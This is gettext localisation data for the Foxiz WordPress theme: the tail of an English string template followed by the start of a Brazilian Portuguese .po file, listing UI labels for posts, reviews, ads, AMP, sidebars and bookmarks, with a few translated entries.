comment" msgstr "" #: templates/entry.php:557 #, php-format msgid "%s comments" msgstr "" #: templates/entry.php:617 msgid "1 View" msgstr "" #: templates/entry.php:619 #, php-format msgid "%s Views" msgstr "" #: templates/entry.php:651 msgid "Ago" msgstr "" #: templates/entry.php:692 #, php-format msgid "%s Min Read" msgstr "" #: templates/entry.php:828 msgid "edit" msgstr "" #: templates/entry.php:1087 msgid "out of 10" msgstr "" #: templates/entry.php:1090 msgid "out of 5" msgstr "" #: templates/entry.php:1159 msgid "Posted by" msgstr "" #: templates/entry.php:1292 msgid "Please update WordPress to the latest version to display this video." msgstr "" #: templates/entry.php:1345 msgid "Please update WordPress to the latest version to display this audio." msgstr "" #: templates/footer.php:212 templates/header/templates.php:621 msgid "Follow US" msgstr "" #: templates/header/templates.php:248 msgid "main menu" msgstr "" #: templates/header/templates.php:289 msgid "Hi," msgstr "" #: templates/header/templates.php:310 msgid "Sign Out" msgstr "" #: templates/header/templates.php:349 templates/parts.php:485 msgid "search" msgstr "" #: templates/header/templates.php:421 msgid "More" msgstr "" #: templates/header/templates.php:615 msgid "Have an existing account?" msgstr "" #: templates/header/templates.php:666 msgid "Switch to Light" msgstr "" #: templates/header/templates.php:667 msgid "Switch to Dark" msgstr "" #: templates/header/templates.php:758 msgid "Resizer" msgstr "" #: templates/header/templates.php:758 msgid "Aa" msgstr "" #: templates/header/templates.php:905 msgid "View Cart" msgstr "" #: templates/modules/category.php:20 msgid "Add More" msgstr "" #: templates/page.php:121 msgid "Something's wrong here..." msgstr "" #: templates/page.php:124 msgid "" "It looks like nothing was found at this location. The page you were looking for does " "not exist or was loading incorrectly." msgstr "" #: templates/parts.php:114 msgid "" "No found posts, Please add a new post for this query or change the block settings: " msgstr "" #: templates/parts.php:116 #, php-format msgid "" "This block requests at least %s posts, Please add new posts for this query or change " "the block settings: " msgstr "" #: templates/parts.php:120 msgid "Edit Page" msgstr "" #: templates/parts.php:175 #, php-format msgid "Dynamic %s pagination" msgstr "" #: templates/parts.php:348 msgid "Previous" msgstr "" #: templates/parts.php:349 msgid "Next" msgstr "" #: templates/parts.php:395 msgid "Newer Articles" msgstr "" #: templates/parts.php:398 msgid "Older Articles" msgstr "" #: templates/parts.php:474 msgid "Search and hit enter..." msgstr "" #: templates/parts.php:588 msgid "Website" msgstr "" #: templates/parts.php:597 msgid "YouTube" msgstr "" #: templates/parts.php:603 msgid "Instagram" msgstr "" #: templates/parts.php:612 msgid "Flickr" msgstr "" #: templates/parts.php:615 msgid "Skype" msgstr "" #: templates/parts.php:618 msgid "SnapChat" msgstr "" #: templates/parts.php:621 msgid "Myspace" msgstr "" #: templates/parts.php:624 msgid "Bloglovin" msgstr "" #: templates/parts.php:627 msgid "Digg" msgstr "" #: templates/parts.php:630 msgid "Dribbble" msgstr "" #: templates/parts.php:633 msgid "SoundCloud" msgstr "" #: templates/parts.php:636 msgid "Vimeo" msgstr "" #: templates/parts.php:651 msgid "Rss" msgstr "" #: templates/parts.php:756 msgid "category featured" msgstr "" #: templates/parts.php:802 msgid "Follow" msgstr "" #: templates/parts.php:803 msgid "Unfollow" msgstr "" #: templates/parts.php:825 msgid "Sign In to Follow" msgstr "" #: templates/popup.php:27 msgid "Accept" msgstr "" #: templates/popup.php:108 msgid "The short code is incorrect or empty form. Please check the setting again!" msgstr "" #: templates/popup.php:206 msgid "Register" msgstr "" #: templates/popup.php:208 msgid "Lost your password?" msgstr "" #: templates/popup.php:242 msgid "Okay, I'll Whitelist" msgstr "" #: templates/single/footer.php:50 msgid "You Might Also Like" msgstr "" #: templates/single/next-posts.php:43 msgid "Continue Reading" msgstr "" #: templates/single/review-comment.php:36 msgid "Older Reviews" msgstr "" #: templates/single/review-comment.php:37 msgid "Newer Reviews" msgstr "" #: templates/single/review-comment.php:43 msgid "Review Closed!" msgstr "" #: templates/single/review-comment.php:49 templates/single/templates.php:883 msgid "Leave a review" msgstr "" #: templates/single/review-comment.php:50 msgid "Leave a reply" msgstr "" #: templates/single/review-comment.php:51 msgid "Post a Review" msgstr "" #: templates/single/review-comment.php:63 msgid "Your Email" msgstr "" #: templates/single/review-comment.php:69 msgid "Your website" msgstr "" #: templates/single/review-comment.php:86 msgid "Please select a rating!" msgstr "" #: templates/single/review-comment.php:87 msgid "Your Rating" msgstr "" #: templates/single/review-comment.php:89 msgid "Rate…" msgstr "" #: templates/single/review-comment.php:90 msgid "Perfect" msgstr "" #: templates/single/review-comment.php:91 msgid "Good" msgstr "" #: templates/single/review-comment.php:92 msgid "Average" msgstr "" #: templates/single/review-comment.php:93 msgid "Not that Bad" msgstr "" #: templates/single/review-comment.php:94 msgid "Very Poor" msgstr "" #: templates/single/review-comment.php:97 msgid "Your comment" msgstr "" #: templates/single/reviews.php:54 #, php-format msgid "%s out of 10" msgstr "" #: templates/single/reviews.php:97 #, php-format msgid "%s out of 5" msgstr "" #: templates/single/reviews.php:175 msgid "Good Stuff" msgstr "" #: templates/single/reviews.php:189 msgid "Bad Stuff" msgstr "" #: templates/single/reviews.php:214 msgid "Summary" msgstr "" #: templates/single/reviews.php:242 msgid "User Votes" msgstr "" #: templates/single/reviews.php:245 msgid "vote" msgstr "" #: templates/single/reviews.php:247 msgid "votes" msgstr "" #: templates/single/templates.php:269 msgid "SHARE" msgstr "" #: templates/single/templates.php:323 templates/single/templates.php:1532 msgid "Share" msgstr "" #: templates/single/templates.php:456 msgid "Updated" msgstr "" #: templates/single/templates.php:564 msgid "Previous Page" msgstr "" #: templates/single/templates.php:580 msgid "Next Page" msgstr "" #: templates/single/templates.php:639 msgid "TAGGED:" msgstr "" #: templates/single/templates.php:670 msgid "SOURCES:" msgstr "" #: templates/single/templates.php:701 msgid "VIA:" msgstr "" #: templates/single/templates.php:753 msgid "What do you think?" msgstr "" #: templates/single/templates.php:808 msgid "Share this Article" msgstr "" #: templates/single/templates.php:886 #, php-format msgid "%s Reviews" msgstr "" #: templates/single/templates.php:888 msgid "1 Review" msgstr "" #: templates/single/templates.php:910 #, php-format msgid "%s Comments" msgstr "" #: templates/single/templates.php:912 msgid "1 Comment" msgstr "" #: templates/single/templates.php:942 msgid "Your review is awaiting moderation." msgstr "" #: templates/single/templates.php:944 msgid "" "Your review is awaiting moderation. This is a preview, your review will be visible " "after it has been approved." msgstr "" #: templates/single/templates.php:970 msgid "Edit" msgstr "" #: templates/single/templates.php:1016 msgid "Previous Article" msgstr "" #: templates/single/templates.php:1029 msgid "Next Article" msgstr "" #: templates/single/templates.php:1341 msgid "List of Images" msgstr "" #: templates/single/templates.php:1485 msgid "Reading:" msgstr "" #: templates/single/templates.php:1587 msgid "Section" msgstr "" #: templates/template-helpers.php:238 templates/template-helpers.php:382 msgid "Read More" msgstr "" PK! xϞYYlanguages/pt_BR.ponu[msgid "" msgstr "" "Project-Id-Version: Foxiz\n" "POT-Creation-Date: 2022-05-18 13:30+0700\n" "PO-Revision-Date: 2022-09-02 00:01+0000\n" "Last-Translator: \n" "Language-Team: Português do Brasil\n" "Language: pt_BR\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "X-Generator: Loco https://localise.biz/\n" "X-Poedit-Basepath: ..\n" "Plural-Forms: nplurals=2; plural=n != 1;\n" "X-Poedit-SourceCharset: UTF-8\n" "X-Poedit-KeywordsList: _x;__;_e;_nx:1,2;esc_html__;esc_html_e;esc_attr__;" "esc_attr_e;foxiz_html__;foxiz_attr__;foxiz_html_e;foxiz_attr_e;_n;_nx;" "_n_noop\n" "X-Poedit-SearchPath-0: .\n" "X-Poedit-SearchPathExcluded-0: *.js\n" "Report-Msgid-Bugs-To: \n" "X-Loco-Version: 2.6.2; wp-6.0.2" #: templates/blog.php:498 msgid " Get started here" msgstr "" #: backend/panels/page.php:30 msgid " Page Header Style" msgstr "" #: backend/panels/footer.php:83 msgid "" "\"Column Border\" and \"Widget Menu Font Size\" and \"Text Color Scheme\" " "will not apply to Ruby template shortcode." msgstr "" #: backend/panels/design.php:103 backend/panels/single-post.php:592 msgid "\"Posted\" Author Label" msgstr "" #: backend/class-tgm-plugin-activation.php:3603 #, php-format msgid "%1$s installed and activated successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:3611 #, php-format msgid "%1$s installed successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:2436 #, php-format msgid "%1$s, %2$s" msgstr "" #: templates/entry.php:320 #, php-format msgid "%s ago" msgstr "" #: templates/single/templates.php:910 #, php-format msgid "%s Comments" msgstr "%s Comentários" #: templates/entry.php:557 #, php-format msgid "%s comments" msgstr "%s comentários" #: templates/entry.php:692 #, php-format msgid "%s Min Read" msgstr "" #: templates/single/reviews.php:54 #, php-format msgid "%s out of 10" msgstr "" #: templates/single/reviews.php:97 #, php-format msgid "%s out of 5" msgstr "" #: templates/single/templates.php:886 #, php-format msgid "%s Reviews" msgstr "" #: templates/entry.php:619 #, php-format msgid "%s Views" msgstr "" #: comments.php:25 msgid "← Older Comments" msgstr "" #: backend/single-metaboxes.php:753 msgid "+Add Heading" msgstr "" #: backend/single-metaboxes.php:208 msgid "+Add Highlight" msgstr "" #: backend/single-metaboxes.php:775 msgid "+Add Post Source" msgstr "" #: backend/single-metaboxes.php:796 msgid "+Add Post Via" msgstr "" #: backend/panels/ads.php:412 msgid "- Advertisement -" msgstr "" #: backend/panels/header.php:612 msgid "- Assign a Menu -" msgstr "" #: backend/category-settings.php:104 backend/category-settings.php:116 #: backend/category-settings.php:142 backend/category-settings.php:242 #: backend/category-settings.php:315 backend/category-settings.php:349 #: backend/category-settings.php:401 backend/configs.php:46 #: backend/configs.php:71 backend/configs.php:106 backend/configs.php:161 #: backend/configs.php:195 backend/configs.php:209 backend/configs.php:236 #: backend/configs.php:288 backend/configs.php:319 backend/configs.php:357 #: backend/configs.php:373 backend/configs.php:424 backend/configs.php:499 #: backend/configs.php:524 backend/configs.php:542 backend/configs.php:559 #: backend/configs.php:583 backend/configs.php:607 backend/configs.php:634 #: backend/configs.php:693 backend/configs.php:732 backend/configs.php:771 #: backend/configs.php:801 backend/configs.php:822 backend/mega-menu.php:139 #: backend/mega-menu.php:150 backend/panels/blog-pages.php:324 #: backend/panels/blog-pages.php:493 backend/panels/blog-pages.php:523 #: backend/panels/blog-pages.php:811 backend/panels/blog-pages.php:980 #: backend/panels/blog-pages.php:1010 backend/panels/blog-pages.php:1394 #: backend/panels/blog-pages.php:1424 backend/panels/blog-pages.php:1633 #: backend/panels/blog-pages.php:1802 backend/panels/blog-pages.php:1832 #: backend/panels/blog-pages.php:2125 backend/panels/blog-pages.php:2294 #: backend/panels/blog-pages.php:2324 backend/panels/bookmark.php:227 #: backend/panels/bookmark.php:392 backend/panels/bookmark.php:414 #: backend/panels/bookmark.php:675 backend/panels/bookmark.php:840 #: backend/panels/bookmark.php:870 backend/panels/design.php:578 #: backend/panels/design.php:595 backend/single-metaboxes.php:60 #: backend/single-metaboxes.php:73 backend/single-metaboxes.php:132 #: backend/single-metaboxes.php:223 backend/single-metaboxes.php:360 #: backend/single-metaboxes.php:408 backend/single-metaboxes.php:487 #: backend/single-metaboxes.php:507 backend/single-metaboxes.php:652 #: backend/single-metaboxes.php:714 backend/single-metaboxes.php:726 #: backend/single-metaboxes.php:824 backend/single-metaboxes.php:843 #: backend/single-metaboxes.php:862 backend/single-metaboxes.php:874 #: backend/single-metaboxes.php:909 msgid "- Default -" msgstr "" #: backend/configs.php:253 backend/mega-menu.php:168 #: backend/panels/bookmark.php:573 backend/panels/login.php:29 msgid "- Disable -" msgstr "" #: backend/panels/login.php:40 msgid "- Left -" msgstr "" #: backend/mega-menu.php:184 msgid "- Select Columns -" msgstr "" #: backend/panels/amp.php:303 backend/panels/amp.php:363 #: backend/panels/amp.php:423 backend/panels/amp.php:484 #: backend/panels/amp.php:544 msgid "-- Adsense --" msgstr "" #: backend/single-metaboxes.php:476 backend/single-metaboxes.php:615 msgid "-- Disable --" msgstr "" #: backend/panels/amp.php:331 backend/panels/amp.php:391 #: backend/panels/amp.php:451 backend/panels/amp.php:512 #: backend/panels/amp.php:572 msgid "-- Responsive --" msgstr "" #: backend/mega-menu.php:128 msgid "-Disable-" msgstr "" #: backend/configs.php:500 backend/mega-menu.php:47 msgid "1 Column" msgstr "" #: templates/single/templates.php:912 msgid "1 Comment" msgstr "1 Comentário" #: templates/entry.php:555 msgid "1 comment" msgstr "1 comentário" #: backend/panels/ads.php:480 backend/panels/newsletter.php:80 msgid "1 Day" msgstr "" #: backend/panels/ads.php:486 backend/panels/newsletter.php:86 msgid "1 Month" msgstr "" #: templates/single/templates.php:888 msgid "1 Review" msgstr "" #: templates/entry.php:617 msgid "1 View" msgstr "" #: backend/panels/ads.php:483 backend/panels/newsletter.php:83 msgid "1 Week" msgstr "" #: backend/configs.php:526 msgid "10px" msgstr "" #: backend/configs.php:527 msgid "14px" msgstr "" #: backend/panels/ads.php:241 msgid "15px" msgstr "" #: backend/configs.php:501 backend/mega-menu.php:48 #: backend/panels/header.php:130 msgid "2 Columns" msgstr "" #: backend/panels/ads.php:481 backend/panels/newsletter.php:81 msgid "2 Days" msgstr "" #: backend/panels/ads.php:484 backend/panels/newsletter.php:84 msgid "2 Weeks" msgstr "" #: backend/configs.php:528 msgid "20px" msgstr "" #: backend/configs.php:502 backend/mega-menu.php:49 #: backend/panels/header.php:131 msgid "3 Columns" msgstr "" #: backend/panels/footer.php:97 msgid "3 Columns (1/2/1)" msgstr "" #: backend/panels/ads.php:482 backend/panels/newsletter.php:82 msgid "3 Days" msgstr "" #: backend/panels/ads.php:485 backend/panels/newsletter.php:85 msgid "3 Weeks" msgstr "" #: backend/configs.php:529 msgid "30px" msgstr "" #: backend/configs.php:503 backend/mega-menu.php:50 #: backend/panels/header.php:132 msgid "4 Columns" msgstr "" #: backend/panels/footer.php:94 msgid "4 Columns (3/2/2/3)" msgstr "" #: backend/panels/ads.php:432 msgid "4,9" msgstr "" #: backend/panels/blog-pages.php:2375 msgid "404 Page" msgstr "" #: backend/configs.php:530 msgid "40px" msgstr "" #: backend/configs.php:504 backend/mega-menu.php:51 #: backend/panels/header.php:133 msgid "5 Columns" msgstr "" #: backend/panels/footer.php:95 msgid "5 Columns (1/1/1/1/1)" msgstr "" #: backend/panels/footer.php:96 msgid "5 Columns (40/15/15/15/15)" msgstr "" #: backend/configs.php:531 msgid "50px" msgstr "" #: backend/configs.php:505 msgid "6 Columns" msgstr "" #: backend/configs.php:532 msgid "60px" msgstr "" #: backend/configs.php:506 msgid "7 Columns" msgstr "" #: backend/configs.php:533 msgid "70px" msgstr "" #: backend/panels/newsletter.php:50 msgid "[mc4wp_form]" msgstr "" #: backend/panels/ads.php:471 backend/panels/blog-pages.php:63 #: backend/panels/blog-pages.php:629 backend/panels/blog-pages.php:1947 #: backend/panels/footer.php:121 backend/panels/header.php:62 msgid "[Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/footer.php:47 msgid "A dotted area for display at the left of the footer." msgstr "" #: includes/sidebars.php:58 msgid "A sidebar section of your site." msgstr "" #: templates/header/templates.php:758 msgid "Aa" msgstr "" #: backend/panels/heading.php:57 backend/panels/heading.php:142 msgid "Accent Heading Color" msgstr "" #: templates/popup.php:27 msgid "Accept" msgstr "Aceitar" #: backend/class-tgm-plugin-activation.php:2820 msgid "Activate" msgstr "" #: backend/class-tgm-plugin-activation.php:2708 #, php-format msgid "Activate %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:2415 msgid "Active" msgstr "" #: backend/panels/ads.php:416 msgid "Ad Align" msgstr "" #: backend/panels/ads.php:409 msgid "Ad Description" msgstr "" #: backend/panels/ads.php:92 backend/panels/ads.php:97 #: backend/panels/ads.php:280 backend/panels/ads.php:285 msgid "Ad Type" msgstr "" #: backend/panels/adblock.php:29 msgid "AdBlock Detected" msgstr "" #: backend/panels/adblock.php:13 backend/panels/adblock.php:19 msgid "AdBlock Detector" msgstr "" #: templates/entry.php:553 msgid "Add a Comment" msgstr "" #: backend/panels/design.php:328 msgid "Add a Crop Size" msgstr "" #: backend/panels/newsletter.php:63 msgid "Add a link for the footer text (optional)." msgstr "" #: backend/panels/single-post.php:1403 msgid "Add a ruby template shortcode you would like to in this section.." msgstr "" #: backend/panels/sidebar.php:38 msgid "Add a Sidebar ID" msgstr "" #: backend/single-metaboxes.php:515 msgid "Add Criteria" msgstr "" #: templates/modules/category.php:20 msgid "Add More" msgstr "" #: backend/panels/woocommerce.php:228 msgid "Add to Cart Color" msgstr "" #: backend/panels/header.php:581 msgid "Adding a custom logo for the login form in the dark mode." msgstr "" #: backend/panels/header.php:573 msgid "" "Adding a custom logo for the login form. Leave blank to set it as the " "default." msgstr "" #: backend/panels/socials.php:16 msgid "Adding social profiles for your website." msgstr "" #: backend/panels/login.php:140 msgid "Admin Bar" msgstr "" #: backend/panels/ads.php:15 msgid "Ads & Slide Up" msgstr "" #: backend/panels/ads.php:30 msgid "Adsense - Auto Ads" msgstr "" #: backend/single-metaboxes.php:554 msgid "advantage item" msgstr "" #: backend/single-metaboxes.php:546 msgid "Advantages" msgstr "" #: backend/configs.php:378 msgid "After Entry Category" msgstr "" #: templates/entry.php:651 msgid "Ago" msgstr "" #: backend/panels/blog-pages.php:1510 msgid "" "Ajax pagination is only available for the tag. The theme will fallback to " "the numeric type for other archive pages." msgstr "" #: backend/panels/header.php:636 backend/panels/header.php:651 msgid "Alert Bar" msgstr "" #: backend/panels/header.php:666 msgid "Alert Content" msgstr "" #: backend/panels/header.php:673 msgid "Alert URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2482 #, php-format msgid "All (%s)" msgid_plural "All (%s)" msgstr[0] "" msgstr[1] "" #: backend/class-tgm-plugin-activation.php:3604 msgid "All installations and activations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:3612 msgid "All installations have been completed." msgstr "" #: backend/class-tgm-plugin-activation.php:406 #, php-format msgid "All plugins installed and activated successfully. %1$s" msgstr "" #: backend/install-plugins.php:82 #, php-format msgid "All plugins installed and activated successfully. %s" msgstr "" #: backend/panels/ads.php:430 backend/panels/amp.php:590 msgid "Allow multiple positions, separated by commas. For example: 4,9" msgstr "" #: backend/panels/bookmark.php:52 msgid "Allow or disallow guest users can bookmark posts." msgstr "" #: backend/panels/ads.php:487 msgid "Always Display" msgstr "" #: backend/panels/amp.php:28 msgid "AMP" msgstr "" #: backend/panels/amp.php:277 msgid "AMP Ads" msgstr "" #: backend/panels/amp.php:247 msgid "AMP Auto Ads" msgstr "" #: backend/panels/amp.php:261 msgid "AMP Auto Ads Code" msgstr "" #: backend/panels/amp.php:304 backend/panels/amp.php:364 #: backend/panels/amp.php:424 backend/panels/amp.php:485 #: backend/panels/amp.php:545 msgid "AMP Custom Script Ad" msgstr "" #: backend/panels/amp.php:62 msgid "AMP Debug" msgstr "" #: backend/panels/amp.php:91 msgid "AMP Footer Logo" msgstr "" #: backend/panels/header.php:244 msgid "AMP Header - Search Icon" msgstr "" #: backend/panels/amp.php:83 msgid "amp_footer Settings" msgstr "" #: backend/class-tgm-plugin-activation.php:3595 #, php-format msgid "An error occurred while installing %1$s: %2$s." msgstr "" #: backend/panels/reaction.php:46 msgid "Angry" msgstr "" #: backend/panels/typography.php:1096 msgid "Archive & Menu Widgets" msgstr "" #: backend/panels/breadcrumb.php:94 msgid "Archive Breadcrumb" msgstr "" #: backend/panels/blog-pages.php:1487 msgid "Archive Header" msgstr "" #: backend/panels/woocommerce.php:116 msgid "Archive Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:108 msgid "Archive Sidebar Position" msgstr "" #: templates/blog.php:476 templates/modules/category.php:74 #: templates/modules/category.php:134 templates/modules/category.php:197 #: templates/modules/category.php:270 templates/modules/category.php:337 msgid "Article" msgstr "" #: backend/panels/optimized.php:152 msgid "Article Markup" msgstr "" #: backend/single-metaboxes.php:858 msgid "Article Schema Markup" msgstr "" #: templates/blog.php:478 templates/modules/category.php:72 #: templates/modules/category.php:132 templates/modules/category.php:195 #: templates/modules/category.php:268 templates/modules/category.php:335 msgid "Articles" msgstr "Postagens" #: backend/panels/header.php:610 msgid "" "Assign a menu for displaying when hovering on the login icon if user logged." msgstr "" #: backend/category-settings.php:303 backend/panels/blog-pages.php:313 #: backend/panels/blog-pages.php:800 backend/panels/blog-pages.php:1214 #: backend/panels/blog-pages.php:1622 backend/panels/blog-pages.php:2114 #: backend/panels/bookmark.php:216 backend/panels/bookmark.php:664 #: backend/panels/page.php:74 backend/panels/single-post.php:433 #: backend/panels/single-post.php:1457 backend/single-metaboxes.php:97 #: backend/single-metaboxes.php:456 msgid "Assign a Sidebar" msgstr "" #: backend/single-metaboxes.php:98 msgid "" "Assign a sidebar for this page. It will override on the default settings in " "the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:457 msgid "" "Assign a sidebar for this post. It will override on the default settings in " "the Theme Options panel." msgstr "" #: backend/panels/single-post.php:434 msgid "" "Assign a sidebar if you select a single layout which has the sidebar. You " "can set an individual sidebar for each post in the post editor page." msgstr "" #: backend/panels/single-post.php:1458 msgid "" "Assign a special sidebar for all next load posts, Recommended use simple or " "advert content." msgstr "" #: backend/category-settings.php:304 backend/panels/blog-pages.php:314 #: backend/panels/blog-pages.php:801 backend/panels/blog-pages.php:1215 #: backend/panels/blog-pages.php:1623 backend/panels/blog-pages.php:2115 #: backend/panels/bookmark.php:217 msgid "" "Assign a widget section for the sidebar for the latest blog section if it is " "enabled." msgstr "" #: backend/panels/page.php:75 msgid "" "Assign a widget section for the sidebar for the single page if it is enabled." msgstr "" #: backend/panels/bookmark.php:665 msgid "" "Assign a widget section for the sidebar for this section if it is enabled." msgstr "" #: backend/mega-menu.php:162 msgid "" "Assign this sidebar (Appearance > Widgets) as this mega menu. Each widget is " "added will be corresponding to a column." msgstr "" #: backend/panels/design.php:306 msgid "" "Assigning correct size for layouts is important for the look and give the " "best performance of your website.." msgstr "" #: backend/panels/single-post.php:839 msgid "At Bottom of Post Content" msgstr "" #: backend/panels/single-post.php:700 msgid "At the Top" msgstr "" #: backend/mega-menu.php:245 msgid "Attachment/SVG URL" msgstr "" #: backend/single-metaboxes.php:258 msgid "Attribution" msgstr "" #: backend/single-metaboxes.php:371 msgid "Audio Format" msgstr "" #: backend/panels/design.php:491 msgid "Audio Icon" msgstr "" #: backend/panels/design.php:515 msgid "Audio Icon Color" msgstr "" #: backend/single-metaboxes.php:377 msgid "Audio Layout" msgstr "" #: backend/panels/single-post.php:97 msgid "Audio Post Format Layout" msgstr "" #: backend/panels/single-post.php:103 msgid "Audio Post Layout" msgstr "" #: backend/single-metaboxes.php:386 msgid "Audio URL" msgstr "" #: backend/panels/blog-pages.php:1063 msgid "Author" msgstr "" #: backend/configs.php:402 backend/panels/design.php:268 msgid "author (Author)" msgstr "" #: backend/panels/blog-pages.php:1077 msgid "Author Bio" msgstr "" #: backend/panels/breadcrumb.php:83 msgid "Author Breadcrumb" msgstr "" #: backend/panels/amp.php:195 backend/panels/single-post.php:383 msgid "Author Card" msgstr "" #: backend/panels/single-post.php:377 msgid "Author Card & Next/Prev Pagination" msgstr "" #: backend/panels/blog-pages.php:1072 msgid "Author Header" msgstr "" #: backend/panels/single-post.php:600 msgid "Author Job" msgstr "" #: backend/panels/amp.php:257 msgid "" "Auto ads for AMP automatically place AdSense Auto ads on your AMP pages. " "Google will automatically show ads on your AMP pages at optimal times when " "they are likely to perform well and provide a good experience." msgstr "" #: backend/panels/ads.php:31 msgid "" "Auto ads will scan your site and automatically place ads where they are " "likely to perform well and potentially generate more revenue." msgstr "" #: backend/panels/ads.php:49 msgid "Auto Adsense Ads Code" msgstr "" #: backend/panels/single-post.php:1424 backend/panels/single-post.php:1433 #: backend/single-metaboxes.php:820 msgid "Auto Load Next Posts" msgstr "" #: backend/panels/design.php:426 msgid "Auto Play Next Slides" msgstr "" #: backend/panels/design.php:435 msgid "Auto Play Speed" msgstr "" #: backend/panels/single-post.php:111 backend/single-metaboxes.php:404 msgid "Autoplay Audio" msgstr "" #: backend/panels/single-post.php:112 msgid "Autoplay the featured audio when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:75 msgid "Autoplay the featured video when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:74 backend/single-metaboxes.php:356 msgid "Autoplay Video" msgstr "" #: backend/class-tgm-plugin-activation.php:2604 msgid "Available version:" msgstr "" #: backend/configs.php:401 msgid "avatar (Avatar)" msgstr "" #: backend/category-settings.php:482 backend/category-settings.php:490 #: backend/panels/blog-pages.php:506 backend/panels/blog-pages.php:514 #: backend/panels/blog-pages.php:993 backend/panels/blog-pages.php:1001 #: backend/panels/blog-pages.php:1407 backend/panels/blog-pages.php:1415 #: backend/panels/blog-pages.php:1815 backend/panels/blog-pages.php:1823 #: backend/panels/blog-pages.php:2307 backend/panels/blog-pages.php:2315 #: backend/panels/bookmark.php:405 backend/panels/bookmark.php:853 #: backend/panels/bookmark.php:861 backend/panels/single-post.php:610 msgid "avatar,author" msgstr "" #: backend/category-settings.php:360 msgid "avatar,author,date" msgstr "" #: templates/single/review-comment.php:92 msgid "Average" msgstr "" #: backend/panels/amp.php:145 backend/panels/amp.php:151 #: backend/panels/general.php:25 msgid "Back to Top" msgstr "" #: backend/configs.php:873 msgid "Background" msgstr "" #: backend/configs.php:289 backend/configs.php:320 msgid "Background 1" msgstr "" #: backend/configs.php:290 backend/configs.php:321 msgid "Background 1 (Big)" msgstr "" #: backend/configs.php:291 backend/configs.php:322 msgid "Background 2" msgstr "" #: backend/configs.php:292 backend/configs.php:323 msgid "Background 2 (Big)" msgstr "" #: backend/configs.php:293 backend/configs.php:324 msgid "Background 3" msgstr "" #: backend/configs.php:294 backend/configs.php:325 msgid "Background 3 (Big)" msgstr "" #: backend/configs.php:295 backend/configs.php:326 msgid "Background 4" msgstr "" #: backend/configs.php:296 backend/configs.php:327 msgid "Background 4 (Big)" msgstr "" #: backend/panels/header-style.php:191 backend/panels/header.php:682 #: backend/panels/privacy.php:40 msgid "Background Color" msgstr "" #: backend/mega-menu.php:222 msgid "Background color" msgstr "" #: backend/panels/general.php:49 msgid "Backup all your settings to a file or restore your settings." msgstr "" #: templates/single/reviews.php:189 msgid "Bad Stuff" msgstr "" #: backend/configs.php:843 msgid "Banner (468x60)" msgstr "" #: backend/panels/single-post.php:1761 msgid "Bar Color" msgstr "" #: backend/panels/single-post.php:1753 msgid "Bar Height" msgstr "" #: backend/panels/single-post.php:350 msgid "" "Be keep up! Get the latest breaking news delivered straight to your inbox." msgstr "" #: backend/class-tgm-plugin-activation.php:393 backend/install-plugins.php:79 msgid "Begin activating plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:383 backend/install-plugins.php:78 msgid "Begin installing plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:388 msgid "Begin updating plugin" msgstr "" #: backend/panels/design.php:355 msgid "" "Below is the list of image sizes. Enable or disable any size you would like." msgstr "" #: backend/panels/single-post.php:576 msgid "Big Avatar" msgstr "" #: backend/configs.php:858 msgid "Billboard (970x250)" msgstr "" #: backend/panels/typography.php:1030 msgid "Block Heading" msgstr "" #: backend/panels/typography.php:806 backend/panels/typography.php:812 msgid "Block Quote" msgstr "" #: backend/panels/blog-pages.php:571 msgid "Blog & Archive" msgstr "" #: backend/category-settings.php:323 backend/panels/blog-pages.php:340 #: backend/panels/blog-pages.php:827 backend/panels/blog-pages.php:1241 #: backend/panels/blog-pages.php:1649 backend/panels/blog-pages.php:2141 #: backend/panels/bookmark.php:243 backend/panels/bookmark.php:691 msgid "Blog Design" msgstr "" #: backend/panels/blog-pages.php:588 msgid "Blog Index" msgstr "" #: backend/panels/blog-pages.php:250 backend/panels/blog-pages.php:731 #: backend/panels/blog-pages.php:737 backend/panels/blog-pages.php:1145 #: backend/panels/blog-pages.php:1151 backend/panels/blog-pages.php:1553 #: backend/panels/blog-pages.php:1559 backend/panels/blog-pages.php:2045 #: backend/panels/blog-pages.php:2051 backend/panels/bookmark.php:149 #: backend/panels/bookmark.php:154 backend/panels/bookmark.php:594 #: backend/panels/single-post.php:1336 msgid "Blog Layout" msgstr "" #: backend/category-settings.php:238 msgid "Blog Listing Layout" msgstr "" #: backend/mega-menu.php:135 msgid "Blog Listing Layout: " msgstr "" #: backend/panels/blog-pages.php:1442 backend/panels/blog-pages.php:1850 #: backend/panels/blog-pages.php:2342 backend/panels/bookmark.php:556 msgid "Blog Pagination" msgstr "" #: backend/panels/blog-pages.php:785 backend/panels/blog-pages.php:1199 #: backend/panels/blog-pages.php:1607 backend/panels/blog-pages.php:2099 #: backend/panels/bookmark.php:202 backend/panels/bookmark.php:650 msgid "Blog Sidebar" msgstr "" #: templates/parts.php:624 msgid "Bloglovin" msgstr "" #: backend/panels/socials.php:98 msgid "Bloglovin URL" msgstr "" #: backend/panels/typography.php:35 msgid "Body Font" msgstr "" #: backend/panels/single-post.php:209 msgid "Bold" msgstr "" #: backend/panels/single-post.php:210 msgid "Bold Italic" msgstr "" #: backend/category-settings.php:389 backend/panels/block-classic.php:81 #: backend/panels/block-grid.php:81 backend/panels/block-grid.php:246 #: backend/panels/block-grid.php:411 backend/panels/block-grid.php:584 #: backend/panels/block-grid.php:771 backend/panels/block-list.php:89 #: backend/panels/block-list.php:262 backend/panels/block-list.php:443 #: backend/panels/block-list.php:638 backend/panels/blog-pages.php:416 #: backend/panels/blog-pages.php:903 backend/panels/blog-pages.php:1317 #: backend/panels/blog-pages.php:1725 backend/panels/blog-pages.php:2217 #: backend/panels/bookmark.php:315 backend/panels/bookmark.php:763 msgid "Bookmark Icon" msgstr "" #: backend/panels/bookmark.php:14 backend/panels/bookmark.php:37 msgid "Bookmark System" msgstr "" #: backend/panels/logo.php:149 msgid "Bookmarklet" 